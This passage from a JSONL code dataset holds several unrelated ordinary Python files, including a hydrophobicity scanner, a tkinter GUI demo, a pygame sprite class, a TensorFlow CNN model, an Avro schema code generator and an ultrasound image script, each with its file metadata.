= shuffle(unX_train, unY_train)\r\n\r\nunX_test, unY_test = shuffle(unX_test, unY_test)\r\n\r\n#%%\r\nunSvm = cv_svm (unX_train, unX_test, unY_train, unY_test)\r\n\r\nprint('Test Accuracy of unSvm on my data = ', round(score(unSvm,myX_test, myY_test), 4))\r\nprint('Test Accuracy of unSvm on u data = ', round(score(unSvm,X_test, y_test), 4))\r\n\r\n#%%\r\n#grid-search for optimal SVM parameters\r\n\r\nfrom sklearn import svm\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\ndo_fit = False;\r\n\r\nif (do_fit):\r\n parameters = {'C': np.arange(0.5, 2.4, .1), 'gamma': np.arange(6.4e-4, 6.6e-4, 1e-5)}\r\n svr = svm.SVC()\r\n clf = GridSearchCV(svr, parameters)\r\n np.random.shuffle(idx)\r\n X_tr = unX_train[idx[:1000]]\r\n y_tr = unY_train[idx[:1000]]\r\n \r\n clf.fit(X_tr, y_tr)\r\n \r\n print(clf.best_params_, clf.best_score_)\r\n\r\n#%%-\r\nfrom moviepy.editor import VideoFileClip\r\n\r\nthr = 18\r\ntau = 0.95\r\nscales = [3, 4, 5]\r\nheat = np.zeros_like(img[:,:,0]).astype(np.float)\r\nscales = [3, 4, 5]\r\n\r\n \r\nvideo_output = 'out/p5C08sc%d_%.2f_%.1f.mp4' % (345, tau, thr)\r\nclip = VideoFileClip('project_video.mp4')#.subclip(30,45)\r\n#clip = VideoFileClip('E:\\\\Data\\\\USA\\\\Video\\\\cuts\\\\multiple_01.avi') \r\nfirst_clip = clip.fl_image(process_image)\r\nget_ipython().magic('time first_clip.write_videofile(video_output, audio=False)')\r\n\r\n\r\n","sub_path":"p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"435123575","text":"from itertools import combinations\n\nN = int(input())\nS = list(input().split())\nK = int(input())\n\ncombos = list(combinations(S,K))\n\ntrue_count = 0\n\nfor element in combos:\n\tfound = False\n\tfor j in element:\n\t\tif j == 'a':\n\t\t\ttrue_count += 1\n\t\t\tfound = True\n\t\t\tbreak\n\nprint(\"{0:.4f}\".format( true_count/len(combos)))\n","sub_path":"Python/Itertools/IterablesAndIterators.py","file_name":"IterablesAndIterators.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"482779082","text":"import sys\nfrom translate import translate\n\n\"\"\"\nFirst element is three letter representation of amino acid\nSecond element: one letter representaion of amino acid\nThird element: kdHydrophobicity\nFourth element: wwHydrophobicity\nFifth element: hhHydrophobicity\n\"\"\"\n\nhydrophobicity = [\n (\"Ile\", \"I\", 4.5, 0.31, -0.60 ),\n (\"Val\", \"V\", 4.2, -0.07, -0.31),\n (\"Leu\", \"L\", 3.8, 0.56, -0.55),\n (\"Phe\", \"F\", 2.8, 1.13, -0.32),\n (\"Cys\", \"C\", 2.5, 0.24, -0.13),\n (\"Met\", \"M\", 1.9, 0.23, -0.10),\n (\"Ala\", \"A\", 1.8, -0.17, 0.11),\n (\"Gly\", \"G\", -0.4, -0.01, 0.74),\n (\"Thr\", \"T\", -0.7, -0.14, 0.52),\n (\"Ser\", \"S\", -0.8, -0.13, 0.84),\n (\"Trp\", \"W\", -0.9, 1.85, 0.30),\n (\"Tyr\", \"Y\", -1.3, 0.94, 0.68),\n (\"Pro\", \"P\", -1.6, -0.45, 2.23),\n (\"His\", \"H\", -3.2, -0.96, 2.06),\n (\"Glu\", \"E\", -3.5, -2.02, 2.68),\n (\"Gln\", \"Q\", -3.5, -0.58, 2.36),\n (\"Asp\", \"D\", -3.5, -1.23, 3.49),\n (\"Asn\", \"N\", -3.5, -1.23, 3.49),\n (\"Lys\", \"K\", -3.9, -0.99, 2.71),\n (\"Arg\", \"R\", -4.5, -0.81, 2.58)\n]\n\n\"\"\"\nget the total hydrophobicity given the region length\nprint out the regions that have high hydrophobicity\n@param aminoAcid \n@param minLen minimal length of region\n@param maxLen maximum length of region\n\"\"\"\ndef getHdyroRegion(aminoAcid, minLen, maxLen):\n acid = aminoAcid[0 : len(aminoAcid) - 4] # remove \"stop\" codon\n print(acid)\n results = [] #store potential region\n resultsIndex = [] #store region index\n preI = -999\n preLen = 0\n for i in range(0, len(acid) - minLen + 1): #loop through amino acid with given length\n for j in range(minLen, maxLen): #try different length of region: from min to max\n hydroSum = 0 \n if((i + j) < len(acid)): #aviod out of bound\n region = acid[i : i + j] #get subregion \n for k in range(0, j ): #sum up the hydro. \n hydroSum += getHydro(region[k])\n flag = (i - preI) >= preLen #the start index of second region should at least j away from the start of previous region\n if (hydroSum >= 45) and flag: # if the sum is greater than a critical value, then it is a transport potein \n results.append(region) # store subregion\n preLen = len(region)\n preI = i\n index = (i, i + j)\n resultsIndex.append(index)\n break #once find a high hydro. stop increasing the length of region \n else:\n continue #continue increase the size of region\n print(resultsIndex, end=\"\\n\")\n print(results, end=\"\\n\\n\") #print subregion. Will decide how to highlight the region\n\n\"\"\"\nget the individual hydrophobicity\n@param acid individual aminio acid\n@return hhHydrophobicity by default\n\"\"\"\ndef getHydro(acid): #get individual hydro. given an acid\n for acidHydro in hydrophobicity:\n if acid in acidHydro[1]: \n return acidHydro[4]\n\n\n\ndef main(argv):\n\t\"\"\"\n\t\tGiven a FASTA file, translate from RNA to amino acids\n\t\t\n\t\tUsage:\n\t\tpython main.py fasta.txt\n\t\"\"\"\n\tif(len(argv) < 2):\n\t\tprint(\"Translates RNA sequences in a FASTA file into an amino acid sequence\")\n\t\tprint(\"Usage: python\", argv[0], \"fasta.txt\")\n\t\treturn\n\t\n\tfile = open(argv[1], \"r\")\n\tfor line in file:\n\t\tif line[0] == \">\":\n\t\t\tname = line[1:-1] #Omits the > and the newline character\n\t\t\tsequence = file.readline()[:-1] #Omits the newline character\n\t\t\tprint(name)\n\t\t\ttranslation = translate(sequence)\n \n\t\t\tgetHdyroRegion(str(translation), 17, 22)\n \n\t\t\t\nif __name__ == \"__main__\":\n\tmain(sys.argv)","sub_path":"getHydro.py","file_name":"getHydro.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"281400088","text":"import datetime as dt\nfrom tkinter import *\n\nimport pymongo\n\n\ndef get_mongo():\n global get_data\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[\"Sensor_Record\"]\n mycol = mydb[\"data1\"]\n for get_data in mycol.find({}, {\"_id\": 0, \"Sensor No\": 1}):\n print(get_data)\n return get_data\n\n\ndef drag_start(event):\n widget = event.widget\n widget.startX = event.x\n widget.startY = event.y\n\n\ndef drag_motion(event):\n widget = event.widget\n x = widget.winfo_x() - widget.startX + event.x\n y = widget.winfo_y() - widget.startY + event.y\n widget.place(x=x, y=y)\n\n\ndef time_func():\n time_data = dt.datetime.now().strftime('%Y-%m-%d %X')\n return time_data\n\n\nroot = Tk()\nroot.title(\"DragTable\")\nroot.geometry(\"800x600\")\nroot.state('zoomed')\n\n# root.configure(bg='white')\n\n\nhello_button = Button(root, text=\"Hello\", pady=6)\n\nhello_button.pack()\n\nlabel = Label(root, bg=\"red\", width=8, height=4, text=time_func(), fg='blue', pady=10, padx=10, font=10)\nlabel.place(x=150, y=150)\n# label.config(text=print_func())\n\nlabel2 = Label(root, bg=\"blue\", width=8, height=4, text=\"BLUE\")\nlabel2.place(x=300, y=300)\n\nlabel3 = Label(root, bg=\"green\", width=8, height=4, text=\"GREEN\")\nlabel3.place(x=450, y=450)\n\nrectangle1 = Canvas(root, width=500, height=200)\nrectangle1.pack()\n\nrectangle1.create_rectangle(20, 140, 120, 180, fill=\"red\")\nrectangle1.create_text(70, 130, text=\"Projects--20%\")\nrectangle1.create_rectangle(140, 160, 240, 180, fill=\"blue\")\nrectangle1.create_text(190, 150, text=\"Quizzes--10%\")\nrectangle1.create_rectangle(260, 120, 360, 180, fill=\"green\")\nrectangle1.create_text(310, 110, text=\"Midterm--30%\")\nrectangle1.create_rectangle(380, 100, 480, 180, fill=\"orange\")\nrectangle1.create_text(430, 90, text=\"Final--40%\")\nrectangle1.create_line(0, 180, 500, 180)\n\nrect2 = Canvas(root, width=250, height=250)\nrect2.pack()\nrect2.create_rectangle(40, 180, 160, 220, fill=\"black\")\nrect2.create_text(70, 130, text=time_func())\n\nrectangle1.bind(\"\", drag_start)\nrectangle1.bind(\"\", drag_motion)\n\nrect2.bind(\"\", drag_start)\nrect2.bind(\"\", drag_motion)\n\nlabel.bind(\"\", drag_start)\nlabel.bind(\"\", drag_motion)\n\nlabel2.bind(\"\", drag_start)\nlabel2.bind(\"\", drag_motion)\n\nlabel3.bind(\"\", drag_start)\nlabel3.bind(\"\", drag_motion)\n\nhello_button.bind(\"\", drag_start)\nhello_button.bind(\"\", drag_motion)\n\nget_mongo()\nroot.mainloop()\n","sub_path":"version4.py","file_name":"version4.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"637784473","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author:\n Lucas Yuki Imamura\n Maria Fernanda Bittelbrunn Toniasso\n Vitor Hugo Homem Marzarotto\n\"\"\"\nimport images\nfrom pygame.sprite import Sprite\nfrom core import RSurface\nimport pygame as pg\nimport math\nimport os\n\n\nclass GameObject(Sprite):\n __bounce_dist = 30\n\n def __init__(self, image_dict: dict, sound_dict: dict, ang: float,\n screen_size: tuple, vel=(0, 0), groups=None):\n \"\"\"\n Parameters\n ----------\n radius : float\n Raio do Ator (para bounding box).\n image_dict : dict\n Dicionario com os sprites do Ator.\n size : tuple\n Tamanho do Ator.\n framerate : float\n Quantidade de frames por segundo\n vel : TYPE, optional\n Velocidade inicial. The default is (0, 0).\n groups : TYPE, optional\n Grupo inicial. The default is None.\n \"\"\"\n self.__rect = pg.Rect(0, 0, 0, 0)\n self.__center = [0, 0]\n\n self.__image_dict = {key: self.load_img(\n **args) for key, args in image_dict.items()}\n self.vel = vel\n self.ang = ang\n self.__screen_size = screen_size\n\n self.__state = list(self.__image_dict.keys())[0]\n self.__image = self.__image_dict[self.__state]\n\n self.state = self.__state\n\n super().__init__(groups)\n\n self.__new_angle = True\n self.__moving = True\n self.__savedgroup = groups\n\n @property\n def radius(self):\n return self.__radius\n\n @radius.setter\n def radius(self, radius: float):\n self.__radius = radius\n self.__radius2 = radius*radius\n\n @property\n def radius2(self):\n return self.__radius2\n\n @property\n def vel(self):\n return self.__vel\n\n @vel.setter\n def vel(self, vel):\n self.__vel = vel\n if abs(self.__vel[0]) + abs(self.__vel[1]) > 0:\n self.__moving = True\n else:\n self.__moving = False\n\n @property\n def ang(self):\n return self.__ang\n\n @ang.setter\n def ang(self, ang):\n self.__ang = ang\n self.__new_angle = True\n self.calc_angle_vector()\n\n @property\n def angle_vector(self):\n return self.__angle_vector\n\n def calc_angle_vector(self):\n ang = math.radians(self.ang)\n self.__angle_vector = (math.cos(ang), -math.sin(ang))\n\n @property\n def screen_size(self):\n return self.__screen_size\n\n @property\n def rect(self):\n return self.__rect\n\n @rect.setter\n def rect(self, position):\n self.__rect.x = position[0]\n self.__rect.y = position[1]\n\n @property\n def center(self):\n return self.__center\n\n @center.setter\n def center(self, pos: list):\n try:\n pos = list(pos)\n assert len(pos) == 2\n except (TypeError, AssertionError) as e:\n print(\"'pos' must be an iterable with x in the first\" +\n \"position and y in the second\")\n raise e\n\n self.__center = pos\n self.__centralize_image()\n\n @property\n def image(self):\n return self.__image\n\n @property\n def state(self):\n return self.__state\n\n @state.setter\n def state(self, new_state):\n self.__state = new_state\n self.__image = self.__image_dict[self.__state]\n\n self.__centralize_image()\n self.radius = self.__image.radius\n\n self.__lim_x_inf = self.__radius + self.__bounce_dist\n self.__lim_y_inf = self.__radius + self.__bounce_dist\n temp = self.__radius + self.__bounce_dist\n self.__lim_x_sup = self.__screen_size[0] - temp\n self.__lim_y_sup = self.__screen_size[1] - temp\n\n @property\n def lim_x_inf(self):\n return self.__lim_x_inf\n\n @property\n def lim_y_inf(self):\n return self.__lim_y_inf\n\n @property\n def lim_x_sup(self):\n return self.__lim_x_sup\n\n @property\n def lim_y_sup(self):\n return self.__lim_y_sup\n\n def load_img(self, R=None, path=None, size=None, image=None):\n\n if image is not None:\n return image\n\n superficie = RSurface(R, size, pg.SRCALPHA)\n\n image = pg.image.load(path)\n image.set_colorkey((255, 255, 255))\n image = image.convert_alpha()\n image = pg.transform.scale(image, size)\n superficie.blit(image, (0, 0))\n return superficie\n\n def revive(self):\n for g in self.__savedgroup:\n g.add(self)\n\n def __centralize_image(self):\n img_size = self.__image.get_size()\n h_size = (img_size[0]/2, img_size[1]/2,)\n self.__rect.update(self.__center[0]-h_size[0],\n self.__center[1]-h_size[1],\n *img_size)\n\n def __rotate(self):\n self.__image = pg.transform.rotate(self.__image_dict[self.state],\n self.ang)\n self.__centralize_image()\n self.__new_angle = False\n\n def move(self, x, y):\n self.__center[0] += x\n self.__center[1] += y\n\n # melhorar dps espelhando o excesso\n if self.__center[0] < self.lim_x_inf:\n self.__center[0] = self.lim_x_inf\n self.vel = (-self.vel[0], self.vel[1])\n elif self.__center[0] > self.lim_x_sup:\n self.__center[0] = self.lim_x_sup\n self.vel = (-self.vel[0], self.vel[1])\n\n # melhorar dps espelhando o excesso\n if self.__center[1] < self.lim_y_inf:\n self.__center[1] = self.lim_y_inf\n self.vel = (self.vel[0], -self.vel[1])\n elif self.__center[1] > self.lim_y_sup:\n self.__center[1] = self.lim_y_sup\n self.vel = (self.vel[0], -self.vel[1])\n\n self.__centralize_image()\n\n def update(self, dt):\n \"\"\"\n Parameters\n ----------\n new_pos : TYPE, optional\n Forçar nova posição do autor, se nada for passado, é calculado\n com base na posição antiga e velocidade atual.\n The default is None.\n\n Returns\n -------\n new_pos: tuple\n Nova posição do Ator.\n\n \"\"\"\n if self.__moving:\n self.move(*self.vel)\n\n if self.__new_angle:\n self.__rotate()\n","sub_path":"core/GameObject.py","file_name":"GameObject.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278259892","text":"import tensorflow as tf\nimport numpy as np\n\nclass CNN_LSTM:\n \n def __init__(self,x,weights,biases,num_filters):\n self.x = x \n self.weights = weights\n self.biases = biases\n self.num_filters = num_filters\n\n def CNN_(self):\n x = tf.transpose(self.x,[0,2,1])\n print(x.get_shape)\n conv1 = tf.nn.conv1d(x,self.weights['conv1'],1,'SAME')\n conv1 = tf.nn.bias_add(conv1,self.biases['conv1'])\n conv1 = tf.keras.layers.BatchNormalization()(conv1)\n conv1 = tf.nn.relu(conv1)\n print(np.array(conv1))\n # 第二层卷积\n conv2 = tf.nn.conv1d(conv1,self.weights['conv2'],1,'SAME')\n conv2 = tf.nn.bias_add(conv2,self.biases['conv2'])\n conv2 = tf.keras.layers.BatchNormalization()(conv2)\n conv2 = tf.nn.relu(conv2)\n print(np.array(conv2))\n # # 第三层卷积\n conv3 = tf.nn.conv1d(conv2,self.weights['conv3'],1,'SAME')\n conv3 = tf.nn.bias_add(conv3,self.biases['conv3'])\n conv3 = tf.keras.layers.BatchNormalization()(conv3)\n conv3 = tf.nn.relu(conv3)\n print(np.array(conv3))\n # 第四层\n conv4 = tf.nn.conv1d(conv3,self.weights['conv4'],1,'SAME')\n conv4 = tf.nn.bias_add(conv4,self.biases['conv4'])\n conv4 = tf.keras.layers.BatchNormalization()(conv4)\n conv4 = tf.nn.relu(conv4)\n print(np.array(conv4))\n # 第五层\n conv5 = tf.nn.conv1d(conv4,self.weights['conv5'],1,'SAME')\n conv5 = tf.nn.bias_add(conv5,self.biases['conv5'])\n conv5 = tf.keras.layers.BatchNormalization()(conv5)\n conv5 = tf.nn.relu(conv5)\n print(np.array(conv5))\n\n conv6 = tf.nn.conv1d(conv5,self.weights['conv6'],1,'SAME')\n conv6 = tf.nn.bias_add(conv6,self.biases['conv6'])\n conv6 = tf.keras.layers.BatchNormalization()(conv6)\n conv6 = tf.nn.relu(conv6)\n print(np.array(conv6))\n\n conv7 = tf.nn.conv1d(conv6,self.weights['conv7'],1,'SAME')\n conv7 = tf.nn.bias_add(conv7,self.biases['conv7'])\n conv7 = tf.keras.layers.BatchNormalization()(conv7)\n conv7 = tf.nn.relu(conv7)\n print(np.array(conv7))\n # 第五层\n conv8 = tf.nn.conv1d(conv7,self.weights['conv8'],1,'SAME')\n conv8 = tf.nn.bias_add(conv8,self.biases['conv8'])\n conv8 = tf.keras.layers.BatchNormalization()(conv8)\n conv8 = tf.nn.relu(conv8)\n print(np.array(conv8))\n\n conv9 = tf.nn.conv1d(conv8,self.weights['conv9'],1,'SAME')\n conv9 = tf.nn.bias_add(conv9,self.biases['conv9'])\n conv9 = tf.keras.layers.BatchNormalization()(conv9)\n conv9 = tf.nn.relu(conv9)\n print(np.array(conv9))\n conv9 = tf.keras.layers.GlobalAveragePooling1D()(conv9)\n return conv9\n\n def LSTM_(self):\n cnn_out = self.CNN_()\n lstm = tf.keras.layers.LSTM(self.num_filters)(cnn_out)\n return lstm\n\n def Return_out(self):\n # lstm_out = self.LSTM_()\n cnn_out = self.CNN_()\n return_out = tf.add(tf.matmul(cnn_out,self.weights['out_w']),self.biases['out_b'])\n\n return return_out","sub_path":"FCN_LSTM/C-LSTM/cnn_lstm_model9.py","file_name":"cnn_lstm_model9.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"354630299","text":"import logging\nimport logging.handlers\n\n_LOG_FMT = '%(asctime)s %(levelname)s [%(filename)s:%(lineno)d] %(message)s'\n\nlogger = logging.getLogger('i3-workspace-groups')\n\ndef init_logger(name: str) -> None:\n syslog_handler = logging.handlers.SysLogHandler(address='/dev/log')\n stdout_handler = logging.StreamHandler()\n stdout_formatter = logging.Formatter(_LOG_FMT)\n stdout_handler.setFormatter(stdout_formatter)\n syslog_formatter = logging.Formatter('{}: {}'.format(name, _LOG_FMT))\n syslog_formatter.ident = name\n syslog_handler.setFormatter(syslog_formatter)\n logger.addHandler(syslog_handler)\n logger.addHandler(stdout_handler)\n","sub_path":"i3wsgroups/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"130963803","text":"\"\"\"Some functions from R-base\n\nIf a function uses DataFrame/DataFrameGroupBy as first argument, it may be\nregistered by `register_verb` and should be placed in `./verbs.py`\n\"\"\"\nimport itertools\nfrom typing import Any, Iterable, Optional\n\nimport pandas\nfrom pandas import Categorical, DataFrame\nfrom pipda import register_func\n\nfrom ..core.middlewares import WithDataEnv\nfrom ..core.types import NumericType\nfrom ..core.contexts import Context\n\n@register_func(None, context=Context.EVAL)\ndef cut(\n x: Iterable[NumericType],\n breaks: Any,\n labels: Optional[Iterable[Any]] = None,\n include_lowest: bool = False,\n right: bool = True,\n precision: int = 2,\n ordered_result: bool = False\n) -> Categorical:\n \"\"\"Divides the range of x into intervals and codes the values in x\n according to which interval they fall. The leftmost interval corresponds\n to level one, the next leftmost to level two and so on.\n\n Args:\n x: a numeric vector which is to be converted to a factor by cutting.\n breaks: either a numeric vector of two or more unique cut points or\n a single number (greater than or equal to 2) giving the number of\n intervals into which x is to be cut.\n labels: labels for the levels of the resulting category. By default,\n labels are constructed using \"(a,b]\" interval notation.\n If labels = False, simple integer codes are returned instead\n of a factor.\n include_lowest: bool, indicating if an ‘x[i]’ equal to the lowest\n (or highest, for right = FALSE) ‘breaks’ value should be included.\n right: bool, indicating if the intervals should be closed on the right\n (and open on the left) or vice versa.\n precision:integer which is used when labels are not given. It determines\n the precision used in formatting the break numbers. Note, this\n argument is different from R's API, which is dig.lab.\n ordered_result: bool, should the result be an ordered categorical?\n\n Returns:\n A categorical object with the cuts\n \"\"\"\n if labels is None:\n ordered_result = True\n\n return pandas.cut(\n x,\n breaks,\n labels=labels,\n include_lowest=include_lowest,\n right=right,\n precision=precision,\n ordered=ordered_result\n )\n\n@register_func(None, context=Context.EVAL)\ndef identity(x: Any) -> Any:\n \"\"\"Return whatever passed in\n\n Expression objects are evaluated using parent context\n \"\"\"\n return x\n\n@register_func(None, context=Context.EVAL)\ndef expandgrid(*args: Iterable[Any], **kwargs: Iterable[Any]) -> DataFrame:\n \"\"\"Expand all combinations into a dataframe. R's `expand.grid()`\"\"\"\n iters = {}\n for i, arg in enumerate(args):\n name = getattr(\n arg,\n 'name',\n getattr(arg, '__name__', f'Var{i}')\n )\n iters[name] = arg\n iters.update(kwargs)\n\n return DataFrame(\n list(itertools.product(*iters.values())),\n columns=iters.keys()\n )\n\n# ---------------------------------\n# Plain functions\n# ---------------------------------\n\ndef data_context(data: DataFrame) -> Any:\n \"\"\"Evaluate verbs, functions in the\n possibly modifying (a copy of) the original data.\n\n It mimic the `with` function in R, but you have to write it in a python way,\n which is using the `with` statement. And you have to use it with `as`, since\n we need the value returned by `__enter__`.\n\n Args:\n data: The data\n func: A function that is registered by\n `pipda.register_verb` or `pipda.register_func`.\n *args: Arguments for func\n **kwargs: Keyword arguments for func\n\n Returns:\n The original or modified data\n \"\"\"\n return WithDataEnv(data)\n","sub_path":"datar/base/funs.py","file_name":"funs.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647118750","text":"\nimport json\nimport os\nimport six\nfrom avro import schema\n\nif six.PY3:\n from io import StringIO\nelse:\n from cStringIO import StringIO\n\n\nif six.PY3:\n from avro.schema import SchemaFromJSONData as make_avsc_object\nelse:\n from avro.schema import make_avsc_object\n\nfrom .core_writer import generate_namespace_modules, clean_fullname\nfrom .tabbed_writer import TabbedWriter\nfrom .core_writer import write_preamble, start_namespace, write_schema_record, write_enum, write_read_file\nfrom .core_writer import write_get_schema, write_reader_impl\nimport logging\n\nlogger = logging.getLogger('avrogen.schema')\nlogger.setLevel(logging.INFO)\n\n\ndef generate_schema(schema_json, use_logical_types=False, custom_imports=None, avro_json_converter=None):\n \"\"\"\n Generate file containing concrete classes for RecordSchemas in given avro schema json\n :param str schema_json: JSON representing avro schema\n :param list[str] custom_imports: Add additional import modules\n :param str avro_json_converter: AvroJsonConverter type to use for default values\n :return Dict[str, str]:\n \"\"\"\n\n if avro_json_converter is None:\n avro_json_converter = 'avrojson.AvroJsonConverter'\n\n if '(' not in avro_json_converter:\n avro_json_converter += '(use_logical_types=%s, schema_types=__SCHEMA_TYPES)' % use_logical_types\n\n custom_imports = custom_imports or []\n names = schema.Names()\n make_avsc_object(json.loads(schema_json), names)\n\n names = [k for k in six.iteritems(names.names) if isinstance(k[1], (schema.RecordSchema, schema.EnumSchema))]\n names = sorted(names, key=lambda x: x[0])\n\n main_out = StringIO()\n writer = TabbedWriter(main_out)\n\n write_preamble(writer, use_logical_types, custom_imports)\n write_schema_preamble(writer)\n write_get_schema(writer)\n write_populate_schemas(writer)\n\n writer.write('\\n\\n\\nclass SchemaClasses(object):')\n writer.tab()\n writer.write('\\n\\n')\n\n current_namespace = tuple()\n\n for name, field_schema in names: # type: str, schema.Schema\n name = clean_fullname(name)\n namespace = tuple(name.split('.')[:-1])\n if namespace != current_namespace:\n start_namespace(current_namespace, namespace, writer)\n current_namespace = namespace\n if isinstance(field_schema, schema.RecordSchema):\n logger.debug('Writing schema: %s', clean_fullname(field_schema.fullname))\n write_schema_record(field_schema, writer, use_logical_types)\n elif isinstance(field_schema, schema.EnumSchema):\n logger.debug('Writing enum: %s', field_schema.fullname)\n write_enum(field_schema, writer)\n writer.write('\\npass\\n')\n writer.set_tab(0)\n writer.write('\\n__SCHEMA_TYPES = {\\n')\n writer.tab()\n\n for name, field_schema in names:\n writer.write(\"'%s': SchemaClasses.%sClass,\\n\" % (clean_fullname(field_schema.fullname), clean_fullname(field_schema.fullname)))\n\n writer.untab()\n writer.write('\\n}\\n')\n\n writer.write('_json_converter = %s\\n\\n' % avro_json_converter)\n\n value = main_out.getvalue()\n main_out.close()\n return value, [clean_fullname(name[0]) for name in names]\n\n\ndef write_schema_preamble(writer):\n \"\"\"\n Writes a schema-specific preamble: __get_names_and_schema() which is used by concrete classes to resolve\n their own RecordSchema\n :param writer:\n :return:\n \"\"\"\n write_read_file(writer)\n writer.write('\\n\\ndef __get_names_and_schema(file_name):')\n with writer.indent():\n writer.write('\\nnames = avro_schema.Names()')\n writer.write('\\nschema = make_avsc_object(json.loads(__read_file(file_name)), names)')\n writer.write('\\nreturn names, schema')\n writer.write('\\n\\n__NAMES, SCHEMA = __get_names_and_schema(os.path.join(os.path.dirname(__file__), \"schema.avsc\"))')\n\n\ndef write_populate_schemas(writer):\n \"\"\"\n Writes out a __SCHEMAS dict which contains all RecordSchemas by their full name. Used by get_schema_type\n :param writer:\n :return:\n \"\"\"\n writer.write('\\n__SCHEMAS = dict((n.fullname.lstrip(\".\"), n) for n in six.itervalues(__NAMES.names))')\n\n\ndef write_namespace_modules(ns_dict, output_folder):\n \"\"\"\n Writes content of the generated namespace modules. A python module will be created for each namespace\n and will import concrete schema classes from SchemaClasses\n :param ns_dict:\n :param output_folder:\n :return:\n \"\"\"\n for ns in six.iterkeys(ns_dict):\n with open(os.path.join(output_folder, ns.replace('.', os.path.sep), \"__init__.py\"), \"w+\") as f:\n currency = '.'\n if ns != '':\n currency += '.' * len(ns.split('.'))\n f.write('from {currency}schema_classes import SchemaClasses\\n'.format(currency=currency))\n for name in ns_dict[ns]:\n f.write(\"{name} = SchemaClasses.{ns}{name}Class\\n\".format(name=name, ns=ns if not ns else (ns + \".\")))\n\n\ndef write_specific_reader(record_types, output_folder, use_logical_types):\n \"\"\"\n Writes specific reader for a avro schema into generated root module\n :param record_types:\n :param output_folder:\n :return:\n \"\"\"\n with open(os.path.join(output_folder, \"__init__.py\"), \"a+\") as f:\n writer = TabbedWriter(f)\n writer.write('\\n\\nfrom .schema_classes import SchemaClasses, SCHEMA as my_schema, get_schema_type')\n writer.write('\\nfrom avro.io import DatumReader')\n if use_logical_types:\n writer.write('\\nfrom avrogen import logical')\n\n write_reader_impl(record_types, writer, use_logical_types)\n\n\ndef write_schema_files(schema_json, output_folder, use_logical_types=False, custom_imports=None):\n \"\"\"\n Generates concrete classes, namespace modules, and a SpecificRecordReader for a given avro schema\n :param str schema_json: JSON containing avro schema\n :param str output_folder: Folder in which to create generated files\n :param list[str] custom_imports: Add additional import modules\n :return:\n \"\"\"\n schema_py, names = generate_schema(schema_json, use_logical_types, custom_imports)\n names = sorted(names)\n\n if not os.path.isdir(output_folder):\n os.mkdir(output_folder)\n\n with open(os.path.join(output_folder, \"schema_classes.py\"), \"w+\") as f:\n f.write(schema_py)\n\n with open(os.path.join(output_folder, \"schema.avsc\"), \"w+\") as f:\n f.write(schema_json)\n\n ns_dict = generate_namespace_modules(names, output_folder)\n\n with open(os.path.join(output_folder, \"__init__.py\"), \"w+\") as f:\n pass # make sure we create this file from scratch\n\n write_namespace_modules(ns_dict, output_folder)\n write_specific_reader(names, output_folder, use_logical_types)\n","sub_path":"avrogen/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319236022","text":"from output_data import *\nfrom process_data import *\nfrom read_data import *\nimport argparse\n\nmetadata = ()\n\n\ndef main():\n \"\"\"Main function to use user inputs and run all functions\n\n \"\"\"\n args = parser_cli()\n\n RFbinaryFilename = args.RFbinaryFilename\n JSONFilename = args.JSONFilename\n display = args.display\n save = args.save\n\n data = readBinary(RFbinaryFilename)\n fs, c, axial_samples, num_beams, beam_spacing = readJSON(JSONFilename)\n\n centered_data = center_data(data)\n rectified_data = rectify_data(centered_data)\n\n filtered_data = low_pass_filter(rectified_data, 15)\n data_compress = log_compression(filtered_data)\n\n processed_data = reshape_process(data_compress, axial_samples, num_beams)\n\n if display:\n Display(processed_data, num_beams, beam_spacing, axial_samples, fs, c)\n if save:\n Save(processed_data, num_beams, beam_spacing, axial_samples, fs, c)\n\n\ndef parser_cli():\n \"\"\"Argparser to take user input arguments\n\n :param argument 0: RF binary filename\n :param argument 1: JSON binary filename\n :param argument 2: display boolean option\n :param argument 3: save boolean option\n :returns: RFbinaryFilename(string), JSONFilename(string)\n \"\"\"\n parser = argparse.ArgumentParser(description='B-mode Ultrasound Imaging.')\n parser.add_argument('--RFbinaryFilename',\n dest=\"RFbinaryFilename\",\n default='rfdat.bin')\n\n parser.add_argument('--JSONFilename',\n dest=\"JSONFilename\",\n default='bmode.json')\n\n parser.add_argument('--display', default=False,\n type=bool, dest=\"display\",\n help='Boolean input argument to render B-mode image')\n\n parser.add_argument('--save', default=True,\n type=bool, dest=\"save\",\n help='Boolean input argument to save PNG B-mode image')\n\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"argparse_func.py","file_name":"argparse_func.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"221084632","text":"import numpy as np\nimport codecs\nfrom faker import Faker\n\nfrom mlxtend.preprocessing import one_hot\nName = []\nAge = np.arange(60,90)\nGender = np.arange(0,2)\nHeight = np.arange(150,190,5)\nWeight = np.arange(60,120,5)\nAddress = np.arange(4000,5000,1)\nPhoneNum = []\nEmail = []\nBSN = []\nOccupation = []\nMarital = np.arange(0,7)\ntime = 